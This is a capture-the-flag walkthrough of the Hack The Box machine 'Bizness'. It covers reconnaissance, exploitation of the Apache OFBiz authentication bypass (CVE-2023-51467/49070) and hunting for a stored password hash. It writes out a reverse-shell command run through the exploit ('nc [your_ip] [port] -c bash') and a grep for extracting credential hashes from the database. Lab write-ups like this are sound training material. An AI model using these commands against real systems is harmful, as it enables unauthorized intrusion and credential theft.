Bizness

Initial Reconnaissance: Nmap Scan

Our initial intel gathering begins with an nmap scan targeting the machine's IP address (10.10.11.252). This scan helps us identify open ports and the services running on the system.

$ sudo nmap -sS -sV -sC 10.10.11.252 -oN nmap/first-scan

Scan Results:

The scan reveals the following open ports:

  • Port 22 (TCP): This is the standard port for SSH (Secure Shell) connections, which allows remote login with encryption.

  • Port 80 (TCP): This is the standard port for HTTP (Hypertext Transfer Protocol), the foundation of web traffic. An open port 80 suggests a web server is present.

  • Port 443 (TCP): This is the standard port for HTTPS (Hypertext Transfer Protocol Secure), the encrypted version of HTTP. The presence of port 443 indicates a web server running with encryption.
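The scan above is read by eye, but on a larger engagement (or on the defending side, when you want to confirm a host exposes only what it should) it is worth turning nmap's normal output into structured data. The following Python is an added example, not part of the original write-up: it parses the -oN format that the command above writes, lists open ports, and compares them against an allow-list. The sample output is constructed; the version strings are placeholders rather than what this box actually reported, and the filtered 8443/tcp line is invented to show that state is preserved.

```python
import re

# Constructed sample of nmap's normal (-oN) output for the scan command above.
# Version column: placeholders, not the target's real banners.
# 8443/tcp: invented, to show that non-open states are kept but not reported as exposure.
NMAP_NORMAL_OUTPUT = """\
# Nmap scan initiated as: nmap -sS -sV -sC 10.10.11.252 -oN nmap/first-scan
Nmap scan report for 10.10.11.252
Host is up (0.050s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE    SERVICE   VERSION
22/tcp   open     ssh       OpenSSH (placeholder version)
80/tcp   open     http      nginx (placeholder version)
443/tcp  open     ssl/http  nginx (placeholder version)
8443/tcp filtered https-alt
|_http-title: (placeholder)
Service Info: OS: Linux
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(
    r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$'
)


def parse_nmap_normal(text):
    """Turn -oN output into a list of dicts, one per port line, whatever its state."""
    findings = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue                       # headers, NSE script output and host lines are skipped
        f = m.groupdict()
        f['port'] = int(f['port'])
        f['version'] = (f['version'] or '').strip()   # lines without a version column give None
        findings.append(f)
    return findings


def open_ports(findings):
    """Port numbers reported as open, in scan order."""
    return [f['port'] for f in findings if f['state'] == 'open']


def unexpected_exposure(findings, expected_ports):
    """Open ports that are not on the allow-list of services the host is supposed to expose."""
    return [f for f in findings if f['state'] == 'open' and f['port'] not in expected_ports]


if __name__ == "__main__":
    findings = parse_nmap_normal(NMAP_NORMAL_OUTPUT)
    print("open:", open_ports(findings))
    for f in unexpected_exposure(findings, {22, 443}):
        print(f"unexpected: {f['port']}/{f['proto']} {f['service']} {f['version']}")
```

Feeding the real nmap/first-scan file to parse_nmap_normal gives the same structure; the allow-list in the usage call is arbitrary and only there to show the comparison.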

Bypassing DNS with /etc/hosts

We've encountered a situation where directly accessing the target machine's web server using its IP address (10.10.11.252) might be cumbersome. To simplify this process, we'll leverage a handy tool: the /etc/hosts file.

The /etc/hosts file acts as a local DNS lookup table. It allows your machine to map hostnames (like bizness.htb) to IP addresses (like 10.10.11.252) without relying on external DNS servers. This approach offers a couple of advantages:

  • Convenience: We can use the more memorable hostname bizness.htb instead of the numerical IP address when accessing the web server.

  • Efficiency: Bypassing the DNS lookup process can potentially speed up our browsing experience, especially if the external DNS server is slow or unavailable.

[!Note]

In this case this is only so that we can view the website, as the domain is not registered with a DNS server.

Adding the Entry:

Once you've added the entry, the screenshot (not reproduced here) confirms the new line in your /etc/hosts file. It resembles:

10.10.11.252 bizness.htb

This simple line instructs your machine to translate any attempt to access bizness.htb in your web browser to the IP address 10.10.11.252.
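To make the "local lookup table" idea concrete, here is an added Python example (not from the original write-up) that parses the /etc/hosts format the way the resolver reads it: comments and blank lines are ignored, one address line can carry several aliases, names are matched case-insensitively, and the first matching line is the one that wins. The sample file content is constructed; only the last entry mirrors the line discussed above.

```python
# Constructed sample of an /etc/hosts file; the last entry mirrors the one
# added for the target in the text above.
HOSTS_SAMPLE = """\
127.0.0.1    localhost
::1          localhost ip6-localhost ip6-loopback
# Lab target, added by hand (constructed sample)
10.10.11.252 bizness.htb    # trailing comments are allowed too
"""


def parse_hosts(text):
    """Return a list of (ip, [hostnames]) in file order, ignoring comments and blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and surrounding whitespace
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                          # an address with no name is not a usable entry
        ip, names = fields[0], fields[1:]
        entries.append((ip, names))
    return entries


def lookup(entries, hostname):
    """All addresses a hostname maps to, in file order.

    Hostnames are matched case-insensitively, as the system resolver does.
    """
    wanted = hostname.lower()
    return [ip for ip, names in entries if wanted in (n.lower() for n in names)]


def first_address(entries, hostname):
    """The address the resolver would actually use, or None if the name is not in the file."""
    matches = lookup(entries, hostname)
    return matches[0] if matches else None


if __name__ == "__main__":
    hosts = parse_hosts(HOSTS_SAMPLE)
    print(first_address(hosts, "bizness.htb"))   # the entry we added
    print(lookup(hosts, "localhost"))           # both the IPv4 and IPv6 loopback lines
```

The first-match behaviour is the practical caveat: a forgotten entry for a hostname you later reuse on another lab box will quietly send your browser to the old address, so lookup returning more than one address for a name is worth a second look.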

Next Steps:

With this configuration in place, you can now fire up your web browser and navigate to https://bizness.htb.

This will directly connect you to the web server running on the target machine, allowing you to proceed with your exploration of the Hack The Box (HTB) box.

Web Page Exploration and Directory Enumeration

Having modified our /etc/hosts file, we can now conveniently access the target machine's web server by navigating to https://bizness.htb in our web browser. Examining the website, we find limited interactivity, suggesting potential client-side rendering or a static website.

Next Steps:

Since the initial web page doesn't offer much in terms of user input or hidden functionalities, we'll shift our focus to directory enumeration. This technique aims to identify hidden or unlinked directories on the web server that might contain sensitive information.

Directory Enumeration Reveals OFBiz Logins

We've now explored the initial web page at https://bizness.htb and discovered it offers limited interaction. To delve deeper, we employed a directory enumeration tool, likely Dirb.

Dirb successfully identified several directories on the target web server, including:

  • /accounting/

  • /ap/ (accounts payable)

  • /ar/ (accounts receivable)

  • Potentially more directories (depending on the output)

Interestingly, accessing some of these directories led to OFBiz login pages. OFBiz (Open For Business) is an open-source enterprise resource planning (ERP) software suite.

Looking closer at the login page, we noticed a version number listed in the bottom left corner. With some quick research on this specific OFBiz version, we discovered a critical vulnerability (CVE-2023-51467 and CVE-2023-49070) reported very recently. This vulnerability allows attackers to bypass authentication and potentially gain unauthorized access to the system, even allowing for a reverse shell!

Exploiting the OFBiz Vulnerability (CVE-2023-51467 & CVE-2023-49070)

While we won't delve into the specifics of exploiting vulnerabilities, publicly available resources often contain tools or code related to known weaknesses. In this case, after finding a repository containing exploit code for the identified OFBiz vulnerability (CVE-2023-51467 and CVE-2023-49070), we could potentially use it to assess the target's susceptibility.

python exploit.py --url https://bizness.htb

[+] Scanning started ...

[+] Apache OFBiz instance seems to be vulnerable. 

The outcome indicates that the target system is indeed vulnerable. This finding presents an opportunity to further investigate potential weaknesses, but it's crucial to remember that such actions should only be conducted in controlled environments with proper authorization, following ethical hacking practices.

Successfully Establishing a Connection

  1. Listener Setup: Open a terminal and set up a listener with Netcat:
   nc -nvlp [port number]

Replace [port number] with your chosen port.

  2. Exploit Execution: In another terminal, navigate to the exploit directory and execute it:
   python exploit.py --url https://bizness.htb --cmd 'nc [your_ip] [port number] -c bash'

Customize [your_ip] with your IP address and [port number] with the listener port.

  3. Shell Access: Upon successful execution, you'll establish a reverse shell connection to your listener. Congratulations! You now have remote access to the target system.

  4. Exploration: With shell access, explore the target system cautiously and execute commands as needed for analysis and exploitation.

Improving Shell Efficiency

Before pursuing the flag, let's enhance our shell for better interaction. I prefer using Python for this, but there are multiple methods you can explore. Here's one way:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Next, we'll send the shell to the background using Ctrl+Z and run:

stty raw -echo; fg

Now, define our Terminal emulator with:

export TERM=xterm

With these adjustments, our shell becomes more responsive, allowing for easier navigation and command recall.

User flag

Let's search for the user flag. Typically, it's located in the home directory, making it easy to find. We can check by listing the home directory:

ofbiz@bizness:/opt/ofbiz$ ls ~/

user.txt

And there you have it—the user flag is right there, waiting to be discovered.

Privilege Escalation

I examined the system using Linpeas and tried several kernel privilege escalation exploits, but didn't have any luck. After some online research, I couldn't find a solution, so I turned to other resources about this box. According to the write-up I found at https://techyrick.com/bizness-hackthebox-writeup/:

To escalate your privileges, you need to search through the OFBiz folder where you've landed the shell and find a user password, which is stored in SHA1. There's no easy shortcut—you just have to get familiar with OFBiz.

To find the SHA1 hash, you can use the command below after navigating to the Derby database directory:

cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0/

grep -arin -o -E '(\w+\w){0,5}password(\W+\w){0,5}' .

Let's break down the command:

  1. grep: This is the command-line utility used for searching text patterns in files.

  2. -a: This flag tells grep to treat binary files as text files, allowing it to search through them.

  3. -r: This flag stands for "recursive", meaning it will search through all files and directories recursively, starting from the current directory (.).

  4. -i: This flag makes the search case-insensitive, so it will match "password", "Password", "PASSWORD", etc.

  5. -n: This flag tells grep to print the line numbers of matching lines along with the lines themselves.

  6. -o: This flag instructs grep to only print the matched parts of a line, rather than the entire line.

  7. -E: This flag enables extended regular expressions, allowing for more complex patterns to be searched.

  8. '(\w+\w){0,5}password(\W+\w){0,5}': This is the pattern we're searching for. Let's break it down further:

  • (\w+\w): This part matches one or more word characters (alphanumeric characters plus underscore) followed by one more word character, i.e. a run of at least two word characters, such as "admin123" or "user_567".

  • {0,5}: This quantifier specifies that the preceding pattern should be repeated between 0 and 5 times. So, (pattern){0,5} matches from 0 to 5 occurrences of the pattern.

  • password: This is the literal string "password" that we're searching for.

  • (\W+\w): This part matches one or more non-word characters (anything other than alphanumeric characters or underscore) followed by a single word character, so each repetition picks up a separator plus the first character of whatever follows it, as in password="$S, where ="$ is the separator run and S the following character.

  • {0,5}: Similar to before, this quantifier specifies that the preceding pattern should be repeated between 0 and 5 times.

  9. .: This specifies the directory to search in. In this case, it's the current directory (.).

and if we look through the file, we can see below:

./c54d0.dat:21:password="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled
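To see exactly what the grep pattern broken down above does, and why -o prints only a fragment of a hit, here is an added Python example (not from the original write-up or the quoted one) that runs the same regular expression over a few constructed lines, reproducing grep's -n -o -i behaviour. Line 2 of the sample is the hit shown above; the other lines are made up. The second pattern and the field split are my additions: the stricter pattern assumes the values of interest are double-quoted attributes as in that hit, and the split assumes the stored value is laid out as type, salt and digest separated by '$', which the page itself does not state.

```python
import re

# The page's grep pattern, unchanged; Python's re accepts the same syntax here.
# -i  -> re.IGNORECASE; -o and -n are reproduced by grep_o() below.
PAGE_PATTERN = re.compile(r'(\w+\w){0,5}password(\W+\w){0,5}', re.IGNORECASE)

# A stricter pattern that captures the whole quoted value instead of a fragment.
# Assumption: the values of interest are double-quoted attributes, as in the hit above.
QUOTED_VALUE = re.compile(r'password="([^"]*)"', re.IGNORECASE)

# Constructed sample lines. Line 2 is the hit shown on the page; the others are
# made up to exercise case-insensitivity and the word-character prefix.
SAMPLE_LINES = [
    'enabled="Y" userLoginId="admin"',
    'password="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled',
    'isSystem="N" PASSWORD_HINT="none"',
    'changeByUser=true hasPassword',
]


def grep_o(lines, pattern=PAGE_PATTERN):
    """Mimic `grep -n -o -i`: (1-based line number, matched fragment) for every match."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for m in pattern.finditer(line):
            hits.append((lineno, m.group(0)))
    return hits


def extract_password_values(lines):
    """(line number, full quoted value) for lines carrying a password="..." attribute."""
    out = []
    for lineno, line in enumerate(lines, start=1):
        m = QUOTED_VALUE.search(line)
        if m:
            out.append((lineno, m.group(1)))
    return out


def split_stored_hash(value):
    """Split a '$type$salt$digest' value into its three fields.

    Assumption (not stated on the page): the value is laid out as type, salt and
    digest separated by '$'. Returns None if the value is not in that shape.
    """
    parts = value.split('$')
    if len(parts) != 4 or parts[0] != '':
        return None
    return parts[1], parts[2], parts[3]


if __name__ == "__main__":
    for lineno, fragment in grep_o(SAMPLE_LINES):
        print(f"{lineno}:{fragment}")          # the truncated fragments -o would print
    for lineno, value in extract_password_values(SAMPLE_LINES):
        print(lineno, split_stored_hash(value))  # the full value, split into its fields
```

The point the fragments make is that (\W+\w) stops at the first word character after the separator, so the page's pattern with -o yields password="$S rather than the whole value; the quoted-attribute pattern is the one to use when you want the stored value itself, and the three-way split makes it obvious that what is stored is a salted digest with the salt right beside it.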